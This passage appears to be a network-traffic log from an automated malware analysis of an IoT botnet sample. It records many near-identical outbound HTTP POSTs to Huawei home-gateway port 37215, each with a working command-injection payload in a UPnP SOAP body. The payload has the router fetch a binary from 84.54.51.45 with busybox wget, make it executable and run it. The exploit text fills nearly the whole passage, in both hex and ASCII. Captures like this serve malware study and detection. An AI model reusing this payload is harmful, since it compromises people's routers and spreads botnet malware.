65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1782192.168.2.154531441.51.119.23537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465009928 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1783192.168.2.155738641.80.244.1537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465018988 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1784192.168.2.153726841.238.206.9837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465054035 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1785192.168.2.155038241.179.36.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465078115 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1786192.168.2.155585841.4.53.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465080023 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1787192.168.2.155118441.101.166.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465112925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1788192.168.2.154661841.80.95.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465121031 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1789192.168.2.153436841.204.192.23937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465137005 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1790192.168.2.153390041.4.17.20137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465159893 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1791192.168.2.154375241.152.163.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465179920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1792192.168.2.155369641.176.39.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465235949 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
